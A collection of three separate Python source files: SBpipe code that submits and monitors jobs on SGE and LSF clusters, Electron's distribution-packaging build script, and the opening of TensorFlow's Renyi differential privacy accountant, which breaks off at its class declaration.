logger.info("For additional information, run SBpipe using the `--verbose` option.")
return True
def run_jobs_sge(cmd, cmd_iter_substr, out_dir, err_dir, runs=1, colnames=[]):
"""
Run jobs using a Sun Grid Engine (SGE) cluster.
:param cmd: the full command to run as a job
:param cmd_iter_substr: the substring in command to be replaced with a number
:param out_dir: the directory containing the standard output from qsub
:param err_dir: the directory containing the standard error from qsub
:param runs: the number of runs. Ignored if colnames is not empty
:param colnames: the name of the columns to process
:return: True if the computation succeeded.
"""
# Test this with echo "ls -la" | xargs xargs using Python environment.
# The following works:
# lsCMD = "ls -la"
# echo_cmd=["echo", lsCMD]
# xargsCMD=["xargs", "xargs"]
# echo_proc = subprocess.Popen(echo_cmd, stdout=subprocess.PIPE)
# xargsProc = subprocess.Popen(xargsCMD, stdin=echo_proc.stdout)
logger.info("Starting computation...")
jobs = ""
cmd_iter_substr = cmd_iter_substr.strip('/')
# get the current level for the StreamHandler
# this must be executed at run-time
if len(logger.handlers) > 1:
handler_level = logger.handlers[1].level
else:
handler_level = logging.INFO
if len(colnames) > 0:
runs = len(colnames)
for i, column in enumerate(colnames):
# Now the same with qsub
jobs = "j" + column + "_" + cmd_iter_substr + "," + jobs
qsub_cmd = ["qsub", "-cwd", "-V", "-N", "j" + column + "_" + cmd_iter_substr, "-o", os.path.join(out_dir, "j" + column), "-e", os.path.join(err_dir, "j" + column), "-b", "y", cmd.replace(cmd_iter_substr, column)]
logger.debug(qsub_cmd)
#logger.info('Starting Task ' + column)
if sys.version_info > (3,):
with subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
qsub_proc = subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE)
qsub_proc.communicate()[0]
if handler_level <= logging.INFO:
sleep(0.01)
progress_bar(i+1, runs)
else:
for i in range(0, runs):
# Now the same with qsub
jobs = "j" + str(i+1) + "_" + cmd_iter_substr + "," + jobs
qsub_cmd = ["qsub", "-cwd", "-V", "-N", "j" + str(i+1) + "_" + cmd_iter_substr, "-o", os.path.join(out_dir, "j" + str(i+1)), "-e", os.path.join(err_dir, "j" + str(i+1)), "-b", "y", cmd.replace(cmd_iter_substr, str(i+1))]
logger.debug(qsub_cmd)
#logger.info('Starting Task ' + str(i+1))
if sys.version_info > (3,):
with subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
qsub_proc = subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE)
qsub_proc.communicate()[0]
if handler_level <= logging.INFO:
sleep(0.01)
progress_bar(i+1, runs)
# Check here when these jobs are finished before proceeding
# don't add names for output and error files as they can generate errors..
qsub_cmd = ["qsub", "-sync", "y", "-b", "y", "-o", "/dev/null", "-e", "/dev/null", "-hold_jid", jobs[:-1], "sbpipe_" + cmd_iter_substr, "1"]
if sys.version_info > (3,):
with subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
qsub_proc = subprocess.Popen(qsub_cmd, stdout=subprocess.PIPE)
qsub_proc.communicate()[0]
logger.debug(qsub_cmd)
logger.info("Computation terminated.")
return quick_debug(cmd, out_dir, err_dir)
def run_jobs_lsf(cmd, cmd_iter_substr, out_dir, err_dir, runs=1, colnames=[]):
"""
Run jobs using a Load Sharing Facility (LSF) cluster.
:param cmd: the full command to run as a job
:param cmd_iter_substr: the substring in command to be replaced with a number
:param out_dir: the directory containing the standard output from bsub
:param err_dir: the directory containing the standard error from bsub
:param runs: the number of runs. Ignored if colnames is not empty
:param colnames: the name of the columns to process
:return: True if the computation succeeded.
"""
logger.info("Starting computation...")
jobs = ""
cmd_iter_substr = cmd_iter_substr.strip('/')
# get the current level for the StreamHandler
# this must be executed at run-time
if len(logger.handlers) > 1:
handler_level = logger.handlers[1].level
else:
handler_level = logging.INFO
if len(colnames) > 0:
runs = len(colnames)
for i, column in enumerate(colnames):
jobs = "done(j" + column + "_" + cmd_iter_substr + ")&&" + jobs
bsub_cmd = ["bsub", "-cwd", "-J", "j" + column + "_" + cmd_iter_substr, "-o", os.path.join(out_dir, "j" + column), "-e",
os.path.join(err_dir, "j" + column), cmd.replace(cmd_iter_substr, column)]
logger.debug(bsub_cmd)
#logger.info('Starting Task ' + column)
if sys.version_info > (3,):
with subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
bsub_proc = subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE)
bsub_proc.communicate()[0]
if handler_level <= logging.INFO:
sleep(0.01)
progress_bar(i+1, runs)
else:
for i in range(0, runs):
jobs = "done(j" + str(i+1) + "_" + cmd_iter_substr + ")&&" + jobs
bsub_cmd = ["bsub", "-cwd", "-J", "j" + str(i+1) + "_" + cmd_iter_substr, "-o", os.path.join(out_dir, "j" + str(i+1)), "-e", os.path.join(err_dir, "j" + str(i+1)), cmd.replace(cmd_iter_substr, str(i+1))]
logger.debug(bsub_cmd)
#logger.info('Starting Task ' + str(i+1))
if sys.version_info > (3,):
with subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
bsub_proc = subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE)
bsub_proc.communicate()[0]
if handler_level <= logging.INFO:
sleep(0.01)
progress_bar(i + 1, runs)
# Check here when these jobs are finished before proceeding
import random
import string
job_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
bsub_cmd = ["bsub", "-J", job_name, "-o", "/dev/null", "-e", "/dev/null", "-w", jobs[:-2], "sbpipe_" + cmd_iter_substr, "1"]
logger.debug(bsub_cmd)
if sys.version_info > (3,):
with subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE) as p:
p.communicate()[0]
else:
bsub_proc = subprocess.Popen(bsub_cmd, stdout=subprocess.PIPE)
bsub_proc.communicate()[0]
# Something better than the following would be highly desirable
import time
found = True
while found:
time.sleep(2)
if sys.version_info > (3,):
with subprocess.Popen(["bjobs", "-psr"], stdout=subprocess.PIPE) as p:
output = p.communicate()[0]
else:
my_poll = subprocess.Popen(["bjobs", "-psr"], stdout=subprocess.PIPE)
output = my_poll.communicate()[0]
if job_name not in output:
found = False
logger.info("Computation terminated.")
return quick_debug(cmd, out_dir, err_dir)
def quick_debug(cmd, out_dir, err_dir):
"""
Look up for `error` and `warning` in the standard output and error files.
A simple debugging function checking the generated log files. We don't stop the computation because it happens
that these messages are more `warnings` than real errors.
:param cmd: the executed command
:param out_dir: the directory containing the standard output files
:param err_dir: the directory contining the standard error files
:return: True
"""
outcome = True
logger.debug("Running parcomp.quick_debug()")
filename = os.path.join(err_dir, "j1")
if os.path.isfile(filename):
if not is_output_file_clean(filename, 'standard error'):
outcome = False
filename = os.path.join(out_dir, "j1")
if os.path.isfile(filename):
if not is_output_file_clean(filename, 'standard output'):
outcome = False
if not outcome:
logger.warning("\nSome computation might have failed. Please check the output in the folders:")
logger.warning("\t" + out_dir + ' (standard output)')
logger.warning("\t" + err_dir + ' (standard error)')
logger.warning("For additional information, run SBpipe using the `--verbose` option.")
logger.warning("(ignore previous warnings if results are generated as expected)")
else:
logger.info("If errors occur, please check the output in the folders: ")
logger.info("\t" + out_dir + ' (standard output)')
logger.info("\t" + err_dir + ' (standard error)')
logger.info("For additional information, run SBpipe using the `--verbose` option.")
# return outcome
return True
def is_output_file_clean(filename, stream_type='standard output'):
"""
Check whether a file contains the string 'error' or 'warning'. If so a message is printed.
:param filename: a file
:param stream_type: 'stderr' for standard error, 'stdout' for standard output.
:return: True
"""
with open(filename) as my_file:
content = my_file.read().replace('\n', ' ').lower()
if 'error' in content:
logger.warning('Found word `error` in ' + stream_type)
logger.warning('\n' + content)
return False
elif 'warning' in content:
logger.warning('Found word `warning` in ' + stream_type)
logger.warning('\n' + content)
else:
logger.debug('\n' + content)
return True
|
|
#!/usr/bin/env python
import glob
import os
import re
import shutil
import subprocess
import sys
import stat
from lib.config import LIBCHROMIUMCONTENT_COMMIT, BASE_URL, PLATFORM, \
get_target_arch, get_chromedriver_version, \
get_platform_key
from lib.util import scoped_cwd, rm_rf, get_electron_version, make_zip, \
execute, electron_gyp
ELECTRON_VERSION = get_electron_version()
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
DIST_DIR = os.path.join(SOURCE_ROOT, 'dist')
OUT_DIR = os.path.join(SOURCE_ROOT, 'out', 'R')
CHROMIUM_DIR = os.path.join(SOURCE_ROOT, 'vendor', 'brightray', 'vendor',
'download', 'libchromiumcontent', 'static_library')
PROJECT_NAME = electron_gyp()['project_name%']
PRODUCT_NAME = electron_gyp()['product_name%']
TARGET_BINARIES = {
'darwin': [
],
'win32': [
'{0}.exe'.format(PROJECT_NAME), # 'electron.exe'
'content_shell.pak',
'd3dcompiler_47.dll',
'icudtl.dat',
'libEGL.dll',
'libGLESv2.dll',
'ffmpeg.dll',
'node.dll',
'content_resources_200_percent.pak',
'ui_resources_200_percent.pak',
'xinput1_3.dll',
'natives_blob.bin',
'snapshot_blob.bin',
],
'linux': [
PROJECT_NAME, # 'electron'
'content_shell.pak',
'icudtl.dat',
'libffmpeg.so',
'libnode.so',
'natives_blob.bin',
'snapshot_blob.bin',
],
}
TARGET_DIRECTORIES = {
'darwin': [
'{0}.app'.format(PRODUCT_NAME),
],
'win32': [
'resources',
'locales',
],
'linux': [
'resources',
'locales',
],
}
def main():
rm_rf(DIST_DIR)
os.makedirs(DIST_DIR)
force_build()
create_symbols()
copy_binaries()
copy_chrome_binary('chromedriver')
copy_chrome_binary('mksnapshot')
copy_license()
if PLATFORM == 'linux':
strip_binaries()
create_version()
create_dist_zip()
create_chrome_binary_zip('chromedriver', get_chromedriver_version())
create_chrome_binary_zip('mksnapshot', ELECTRON_VERSION)
create_ffmpeg_zip()
create_symbols_zip()
def force_build():
build = os.path.join(SOURCE_ROOT, 'script', 'build.py')
execute([sys.executable, build, '-c', 'Release'])
def copy_binaries():
for binary in TARGET_BINARIES[PLATFORM]:
shutil.copy2(os.path.join(OUT_DIR, binary), DIST_DIR)
for directory in TARGET_DIRECTORIES[PLATFORM]:
shutil.copytree(os.path.join(OUT_DIR, directory),
os.path.join(DIST_DIR, directory),
symlinks=True)
def copy_chrome_binary(binary):
if PLATFORM == 'win32':
binary += '.exe'
src = os.path.join(CHROMIUM_DIR, binary)
dest = os.path.join(DIST_DIR, binary)
# Copy file and keep the executable bit.
shutil.copyfile(src, dest)
os.chmod(dest, os.stat(dest).st_mode | stat.S_IEXEC)
def copy_license():
shutil.copy2(os.path.join(CHROMIUM_DIR, '..', 'LICENSES.chromium.html'),
DIST_DIR)
shutil.copy2(os.path.join(SOURCE_ROOT, 'LICENSE'), DIST_DIR)
def strip_binaries():
for binary in TARGET_BINARIES[PLATFORM]:
if binary.endswith('.so') or '.' not in binary:
strip_binary(os.path.join(DIST_DIR, binary))
def strip_binary(binary_path):
if get_target_arch() == 'arm':
strip = 'arm-linux-gnueabihf-strip'
else:
strip = 'strip'
execute([strip, binary_path])
def create_version():
version_path = os.path.join(SOURCE_ROOT, 'dist', 'version')
with open(version_path, 'w') as version_file:
version_file.write(ELECTRON_VERSION)
def create_symbols():
destination = os.path.join(DIST_DIR, '{0}.breakpad.syms'.format(PROJECT_NAME))
dump_symbols = os.path.join(SOURCE_ROOT, 'script', 'dump-symbols.py')
execute([sys.executable, dump_symbols, destination])
if PLATFORM == 'darwin':
dsyms = glob.glob(os.path.join(OUT_DIR, '*.dSYM'))
for dsym in dsyms:
shutil.copytree(dsym, os.path.join(DIST_DIR, os.path.basename(dsym)))
def create_dist_zip():
dist_name = '{0}-{1}-{2}-{3}.zip'.format(PROJECT_NAME, ELECTRON_VERSION,
get_platform_key(),
get_target_arch())
zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
with scoped_cwd(DIST_DIR):
files = TARGET_BINARIES[PLATFORM] + ['LICENSE', 'LICENSES.chromium.html',
'version']
dirs = TARGET_DIRECTORIES[PLATFORM]
make_zip(zip_file, files, dirs)
def create_chrome_binary_zip(binary, version):
dist_name = '{0}-{1}-{2}-{3}.zip'.format(binary, version, get_platform_key(),
get_target_arch())
zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
with scoped_cwd(DIST_DIR):
files = ['LICENSE', 'LICENSES.chromium.html']
if PLATFORM == 'win32':
files += [binary + '.exe']
else:
files += [binary]
make_zip(zip_file, files, [])
def create_ffmpeg_zip():
dist_name = 'ffmpeg-{0}-{1}-{2}.zip'.format(
ELECTRON_VERSION, get_platform_key(), get_target_arch())
zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
if PLATFORM == 'darwin':
ffmpeg_name = 'libffmpeg.dylib'
elif PLATFORM == 'linux':
ffmpeg_name = 'libffmpeg.so'
elif PLATFORM == 'win32':
ffmpeg_name = 'ffmpeg.dll'
shutil.copy2(os.path.join(CHROMIUM_DIR, '..', 'ffmpeg', ffmpeg_name),
DIST_DIR)
if PLATFORM == 'linux':
strip_binary(os.path.join(DIST_DIR, ffmpeg_name))
with scoped_cwd(DIST_DIR):
make_zip(zip_file, [ffmpeg_name, 'LICENSE', 'LICENSES.chromium.html'], [])
def create_symbols_zip():
dist_name = '{0}-{1}-{2}-{3}-symbols.zip'.format(PROJECT_NAME,
ELECTRON_VERSION,
get_platform_key(),
get_target_arch())
zip_file = os.path.join(DIST_DIR, dist_name)
licenses = ['LICENSE', 'LICENSES.chromium.html', 'version']
with scoped_cwd(DIST_DIR):
dirs = ['{0}.breakpad.syms'.format(PROJECT_NAME)]
make_zip(zip_file, licenses, dirs)
if PLATFORM == 'darwin':
dsym_name = '{0}-{1}-{2}-{3}-dsym.zip'.format(PROJECT_NAME,
ELECTRON_VERSION,
get_platform_key(),
get_target_arch())
with scoped_cwd(DIST_DIR):
dsyms = glob.glob('*.dSYM')
make_zip(os.path.join(DIST_DIR, dsym_name), licenses, dsyms)
if __name__ == '__main__':
sys.exit(main())
|
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Privacy accountant that uses Renyi differential privacy."""
import math
from typing import Collection, Optional, Union
import numpy as np
from scipy import special
import six
from dp_accounting import dp_event
from dp_accounting import privacy_accountant
NeighborRel = privacy_accountant.NeighboringRelation
def _log_add(logx, logy):
"""Adds two numbers in the log space."""
a, b = min(logx, logy), max(logx, logy)
if a == -np.inf: # adding 0
return b
# Use exp(a) + exp(b) = (exp(a - b) + 1) * exp(b)
return math.log1p(math.exp(a - b)) + b # log1p(x) = log(x + 1)
def _log_sub(logx, logy):
"""Subtracts two numbers in the log space. Answer must be non-negative."""
if logx < logy:
raise ValueError('The result of subtraction must be non-negative.')
if logy == -np.inf: # subtracting 0
return logx
if logx == logy:
return -np.inf # 0 is represented as -np.inf in the log space.
try:
# Use exp(x) - exp(y) = (exp(x - y) - 1) * exp(y).
return math.log(math.expm1(logx - logy)) + logy # expm1(x) = exp(x) - 1
except OverflowError:
return logx
def _log_sub_sign(logx, logy):
"""Returns log(exp(logx)-exp(logy)) and its sign."""
if logx > logy:
s = True
mag = logx + np.log(1 - np.exp(logy - logx))
elif logx < logy:
s = False
mag = logy + np.log(1 - np.exp(logx - logy))
else:
s = True
mag = -np.inf
return s, mag
def _log_comb(n, k):
"""Computes log of binomial coefficient."""
return (special.gammaln(n + 1) - special.gammaln(k + 1) -
special.gammaln(n - k + 1))
def _compute_log_a_int(q, sigma, alpha):
"""Computes log(A_alpha) for integer alpha, 0 < q < 1."""
assert isinstance(alpha, six.integer_types)
# Initialize with 0 in the log space.
log_a = -np.inf
for i in range(alpha + 1):
log_coef_i = (
_log_comb(alpha, i) + i * math.log(q) + (alpha - i) * math.log(1 - q))
s = log_coef_i + (i * i - i) / (2 * (sigma**2))
log_a = _log_add(log_a, s)
return float(log_a)
def _compute_log_a_frac(q, sigma, alpha):
"""Computes log(A_alpha) for fractional alpha, 0 < q < 1."""
# The two parts of A_alpha, integrals over (-inf,z0] and [z0, +inf), are
# initialized to 0 in the log space:
log_a0, log_a1 = -np.inf, -np.inf
i = 0
z0 = sigma**2 * math.log(1 / q - 1) + .5
while True: # do ... until loop
coef = special.binom(alpha, i)
log_coef = math.log(abs(coef))
j = alpha - i
log_t0 = log_coef + i * math.log(q) + j * math.log(1 - q)
log_t1 = log_coef + j * math.log(q) + i * math.log(1 - q)
log_e0 = math.log(.5) + _log_erfc((i - z0) / (math.sqrt(2) * sigma))
log_e1 = math.log(.5) + _log_erfc((z0 - j) / (math.sqrt(2) * sigma))
log_s0 = log_t0 + (i * i - i) / (2 * (sigma**2)) + log_e0
log_s1 = log_t1 + (j * j - j) / (2 * (sigma**2)) + log_e1
if coef > 0:
log_a0 = _log_add(log_a0, log_s0)
log_a1 = _log_add(log_a1, log_s1)
else:
log_a0 = _log_sub(log_a0, log_s0)
log_a1 = _log_sub(log_a1, log_s1)
i += 1
if max(log_s0, log_s1) < -30:
break
return _log_add(log_a0, log_a1)
def _log_erfc(x):
"""Computes log(erfc(x)) with high accuracy for large x."""
try:
return math.log(2) + special.log_ndtr(-x * 2**.5)
except NameError:
# If log_ndtr is not available, approximate as follows:
r = special.erfc(x)
if r == 0.0:
# Using the Laurent series at infinity for the tail of the erfc function:
# erfc(x) ~ exp(-x^2-.5/x^2+.625/x^4)/(x*pi^.5)
# To verify in Mathematica:
# Series[Log[Erfc[x]] + Log[x] + Log[Pi]/2 + x^2, {x, Infinity, 6}]
return (-math.log(math.pi) / 2 - math.log(x) - x**2 - .5 * x**-2 +
.625 * x**-4 - 37. / 24. * x**-6 + 353. / 64. * x**-8)
else:
return math.log(r)
def _compute_delta(orders, rdp, epsilon):
"""Compute delta given a list of RDP values and target epsilon.
Args:
orders: An array of orders.
rdp: An array of RDP guarantees.
epsilon: The target epsilon.
Returns:
Optimal delta.
Raises:
ValueError: If input is malformed.
"""
if epsilon < 0:
raise ValueError(f'Epsilon cannot be negative. Found {epsilon}.')
if len(orders) != len(rdp):
raise ValueError('Input lists must have the same length.')
# Basic bound (see https://arxiv.org/abs/1702.07476 Proposition 3 in v3):
# delta = min( np.exp((rdp - epsilon) * (orders - 1)) )
# Improved bound from https://arxiv.org/abs/2004.00010 Proposition 12 (in v4):
logdeltas = [] # work in log space to avoid overflows
for (a, r) in zip(orders, rdp):
if a < 1:
raise ValueError(f'Renyi divergence order must be at least 1. Found {a}.')
if r < 0:
raise ValueError(f'Renyi divergence cannot be negative. Found {r}.')
# For small alpha, we are better of with bound via KL divergence:
# delta <= sqrt(1-exp(-KL)).
# Take a min of the two bounds.
if r == 0:
logdelta = -np.inf
else:
logdelta = 0.5 * math.log1p(-math.exp(-r))
if a > 1.01:
# This bound is not numerically stable as alpha->1.
# Thus we have a min value for alpha.
# The bound is also not useful for small alpha, so doesn't matter.
rdp_bound = (a - 1) * (r - epsilon + math.log1p(-1 / a)) - math.log(a)
logdelta = min(logdelta, rdp_bound)
logdeltas.append(logdelta)
return min(math.exp(np.min(logdeltas)), 1.)
def _compute_epsilon(orders, rdp, delta):
"""Compute epsilon given a list of RDP values and target delta.
Args:
orders: An array of orders.
rdp: An array of RDP guarantees.
delta: The target delta. Must be >= 0.
Returns:
Optimal epsilon.
Raises:
ValueError: If input is malformed.
"""
if delta < 0:
raise ValueError(f'Delta cannot be negative. Found {delta}.')
if delta == 0:
if all(r == 0 for r in rdp):
return 0
else:
return np.inf
if len(orders) != len(rdp):
raise ValueError('Input lists must have the same length.')
# Basic bound (see https://arxiv.org/abs/1702.07476 Proposition 3 in v3):
# epsilon = min( rdp - math.log(delta) / (orders - 1) )
# Improved bound from https://arxiv.org/abs/2004.00010 Proposition 12 (in v4).
# Also appears in https://arxiv.org/abs/2001.05990 Equation 20 (in v1).
eps = []
for (a, r) in zip(orders, rdp):
if a < 1:
raise ValueError(f'Renyi divergence order must be at least 1. Found {a}.')
if r < 0:
raise ValueError(f'Renyi divergence cannot be negative. Found {r}.')
if delta**2 + math.expm1(-r) > 0:
# In this case, we can simply bound via KL divergence:
# delta <= sqrt(1-exp(-KL)).
epsilon = 0 # No need to try further computation if we have epsilon = 0.
elif a > 1.01:
# This bound is not numerically stable as alpha->1.
# Thus we have a min value of alpha.
# The bound is also not useful for small alpha, so doesn't matter.
epsilon = r + math.log1p(-1 / a) - math.log(delta * a) / (a - 1)
else:
# In this case we can't do anything. E.g., asking for delta = 0.
epsilon = np.inf
eps.append(epsilon)
return max(0, np.min(eps))
def _stable_inplace_diff_in_log(vec, signs, n=-1):
"""Replaces the first n-1 dims of vec with the log of abs difference operator.
Args:
vec: numpy array of floats with size larger than 'n'
signs: Optional numpy array of bools with the same size as vec in case one
needs to compute partial differences vec and signs jointly describe a
vector of real numbers' sign and abs in log scale.
n: Optonal upper bound on number of differences to compute. If negative, all
differences are computed.
Returns:
The first n-1 dimension of vec and signs will store the log-abs and sign of
the difference.
Raises:
ValueError: If input is malformed.
"""
assert vec.shape == signs.shape
if n < 0:
n = np.max(vec.shape) - 1
else:
assert np.max(vec.shape) >= n + 1
for j in range(0, n, 1):
if signs[j] == signs[j + 1]: # When the signs are the same
# if the signs are both positive, then we can just use the standard one
signs[j], vec[j] = _log_sub_sign(vec[j + 1], vec[j])
# otherwise, we do that but toggle the sign
if not signs[j + 1]:
signs[j] = ~signs[j]
else: # When the signs are different.
vec[j] = _log_add(vec[j], vec[j + 1])
signs[j] = signs[j + 1]
def _get_forward_diffs(fun, n):
"""Computes up to nth order forward difference evaluated at 0.
See Theorem 27 of https://arxiv.org/pdf/1808.00087.pdf
Args:
fun: Function to compute forward differences of.
n: Number of differences to compute.
Returns:
Pair (deltas, signs_deltas) of the log deltas and their signs.
"""
func_vec = np.zeros(n + 3)
signs_func_vec = np.ones(n + 3, dtype=bool)
# ith coordinate of deltas stores log(abs(ith order discrete derivative))
deltas = np.zeros(n + 2)
signs_deltas = np.zeros(n + 2, dtype=bool)
for i in range(1, n + 3, 1):
func_vec[i] = fun(1.0 * (i - 1))
for i in range(0, n + 2, 1):
# Diff in log scale
_stable_inplace_diff_in_log(func_vec, signs_func_vec, n=n + 2 - i)
deltas[i] = func_vec[0]
signs_deltas[i] = signs_func_vec[0]
return deltas, signs_deltas
def _compute_log_a(q, noise_multiplier, alpha):
if float(alpha).is_integer():
return _compute_log_a_int(q, noise_multiplier, int(alpha))
else:
return _compute_log_a_frac(q, noise_multiplier, alpha)
def _compute_rdp_poisson_subsampled_gaussian(q, noise_multiplier, orders):
"""Computes RDP of the Poisson sampled Gaussian mechanism.
Args:
q: The sampling rate.
noise_multiplier: The ratio of the standard deviation of the Gaussian noise
to the l2-sensitivity of the function to which it is added.
orders: An array of RDP orders.
Returns:
The RDPs at all orders. Can be `np.inf`.
"""
def compute_one_order(q, alpha):
if np.isinf(alpha) or noise_multiplier == 0:
return np.inf
if q == 0:
return 0
if q == 1.:
return alpha / (2 * noise_multiplier**2)
return _compute_log_a(q, noise_multiplier, alpha) / (alpha - 1)
return np.array([compute_one_order(q, order) for order in orders])
def _compute_rdp_sample_wor_gaussian(q, noise_multiplier, orders):
"""Computes RDP of Gaussian mechanism using sampling without replacement.
This function applies to the following schemes:
1. Sampling w/o replacement: Sample a uniformly random subset of size m = q*n.
2. ``Replace one data point'' version of differential privacy, i.e., n is
considered public information.
Reference: Theorem 27 of https://arxiv.org/pdf/1808.00087.pdf (A strengthened
version applies subsampled-Gaussian mechanism.)
- Wang, Balle, Kasiviswanathan. "Subsampled Renyi Differential Privacy and
Analytical Moments Accountant." AISTATS'2019.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
noise_multiplier: The ratio of the standard deviation of the Gaussian noise
to the l2-sensitivity of the function to which it is added.
orders: An array of RDP orders.
Returns:
The RDPs at all orders, can be np.inf.
"""
return np.array([
_compute_rdp_sample_wor_gaussian_scalar(q, noise_multiplier, order)
for order in orders
])
def _compute_rdp_sample_wor_gaussian_scalar(q, sigma, alpha):
"""Compute RDP of the Sampled Gaussian mechanism at order alpha.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
sigma: The std of the additive Gaussian noise.
alpha: The order at which RDP is computed.
Returns:
RDP at alpha, can be np.inf.
"""
assert (q <= 1) and (q >= 0) and (alpha >= 1)
if q == 0:
return 0
if q == 1.:
return alpha / (2 * sigma**2)
if np.isinf(alpha):
return np.inf
if float(alpha).is_integer():
return _compute_rdp_sample_wor_gaussian_int(q, sigma, int(alpha)) / (
alpha - 1)
else:
# When alpha not an integer, we apply Corollary 10 of [WBK19] to interpolate
# the CGF and obtain an upper bound
alpha_f = math.floor(alpha)
alpha_c = math.ceil(alpha)
x = _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha_f)
y = _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha_c)
t = alpha - alpha_f
return ((1 - t) * x + t * y) / (alpha - 1)
def _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha):
"""Compute log(A_alpha) for integer alpha, subsampling without replacement.
When alpha is smaller than max_alpha, compute the bound Theorem 27 exactly,
otherwise compute the bound with Stirling approximation.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
sigma: The std of the additive Gaussian noise.
alpha: The order at which RDP is computed.
Returns:
RDP at alpha, can be np.inf.
"""
max_alpha = 256
assert isinstance(alpha, six.integer_types)
if np.isinf(alpha):
return np.inf
elif alpha == 1:
return 0
def cgf(x):
# Return rdp(x+1)*x, the rdp of Gaussian mechanism is alpha/(2*sigma**2)
return x * 1.0 * (x + 1) / (2.0 * sigma**2)
def func(x):
# Return the rdp of Gaussian mechanism
return 1.0 * x / (2.0 * sigma**2)
# Initialize with 1 in the log space.
log_a = 0
# Calculates the log term when alpha = 2
log_f2m1 = func(2.0) + np.log(1 - np.exp(-func(2.0)))
if alpha <= max_alpha:
# We need forward differences of exp(cgf)
# The following line is the numerically stable way of implementing it.
# The output is in polar form with logarithmic magnitude
deltas, _ = _get_forward_diffs(cgf, alpha)
# Compute the bound exactly requires book keeping of O(alpha**2)
for i in range(2, alpha + 1):
if i == 2:
s = 2 * np.log(q) + _log_comb(alpha, 2) + np.minimum(
np.log(4) + log_f2m1,
func(2.0) + np.log(2))
elif i > 2:
delta_lo = deltas[int(2 * np.floor(i / 2.0)) - 1]
delta_hi = deltas[int(2 * np.ceil(i / 2.0)) - 1]
s = np.log(4) + 0.5 * (delta_lo + delta_hi)
s = np.minimum(s, np.log(2) + cgf(i - 1))
s += i * np.log(q) + _log_comb(alpha, i)
log_a = _log_add(log_a, s)
return float(log_a)
else:
# Compute the bound with stirling approximation. Everything is O(x) now.
for i in range(2, alpha + 1):
if i == 2:
s = 2 * np.log(q) + _log_comb(alpha, 2) + np.minimum(
np.log(4) + log_f2m1,
func(2.0) + np.log(2))
else:
s = np.log(2) + cgf(i - 1) + i * np.log(q) + _log_comb(alpha, i)
log_a = _log_add(log_a, s)
return log_a
def _effective_gaussian_noise_multiplier(event: dp_event.DpEvent):
"""Determines the effective noise multiplier of nested structure of Gaussians.
A series of Gaussian queries on the same data can be reexpressed as a single
query with pre- and post- processing. For details, see section 3 of
https://arxiv.org/pdf/1812.06210.pdf.
Args:
event: A `dp_event.DpEvent`. In order for conversion to be successful it
must consist of a single `dp_event.GaussianDpEvent`, or a nested structure
of `dp_event.ComposedDpEvent` and/or `dp_event.SelfComposedDpEvent`
bottoming out in `dp_event.GaussianDpEvent`s.
Returns:
The noise multiplier of the equivalent `dp_event.GaussianDpEvent`, or None
if the input event was not a `dp_event.GaussianDpEvent` or a nested
structure of `dp_event.ComposedDpEvent` and/or
`dp_event.SelfComposedDpEvent` bottoming out in `dp_event.GaussianDpEvent`s.
"""
if isinstance(event, dp_event.GaussianDpEvent):
return event.noise_multiplier
elif isinstance(event, dp_event.ComposedDpEvent):
sum_sigma_inv_sq = 0
for e in event.events:
sigma = _effective_gaussian_noise_multiplier(e)
if sigma is None:
return None
sum_sigma_inv_sq += sigma**-2
return sum_sigma_inv_sq**-0.5
elif isinstance(event, dp_event.SelfComposedDpEvent):
sigma = _effective_gaussian_noise_multiplier(event.event)
return None if sigma is None else (event.count * sigma**-2)**-0.5
else:
return None
def _compute_rdp_single_epoch_tree_aggregation(
noise_multiplier: float, step_counts: Union[int, Collection[int]],
orders: Collection[float]) -> Collection[float]:
"""Computes RDP of the Tree Aggregation Protocol for Gaussian Mechanism.
This function implements the accounting when the tree is periodically
restarted and no record occurs twice across all trees. See appendix D of
"Practical and Private (Deep) Learning without Sampling or Shuffling"
https://arxiv.org/abs/2103.00039.
Args:
noise_multiplier: A non-negative float representing the ratio of the
standard deviation of the Gaussian noise to the l2-sensitivity of the
function to which it is added.
step_counts: A scalar or a list of non-negative integers representing the
number of steps per epoch (between two restarts).
orders: An array of RDP orders.
Returns:
The RDPs at all orders. Can be `np.inf`.
"""
if noise_multiplier < 0:
raise ValueError(
f'noise_multiplier must be non-negative. Got {noise_multiplier}.')
if noise_multiplier == 0:
return np.inf
if not step_counts:
raise ValueError(
'steps_list must be a non-empty list, or a non-zero scalar. Got '
f'{step_counts}.')
if np.isscalar(step_counts):
step_counts = [step_counts]
for steps in step_counts:
if steps < 0:
raise ValueError(f'Steps must be non-negative. Got {step_counts}')
max_depth = max(math.ceil(math.log2(steps + 1)) for steps in step_counts)
return np.array([a * max_depth / (2 * noise_multiplier**2) for a in orders])
class RdpAccountant(privacy_accountant.PrivacyAccountant):
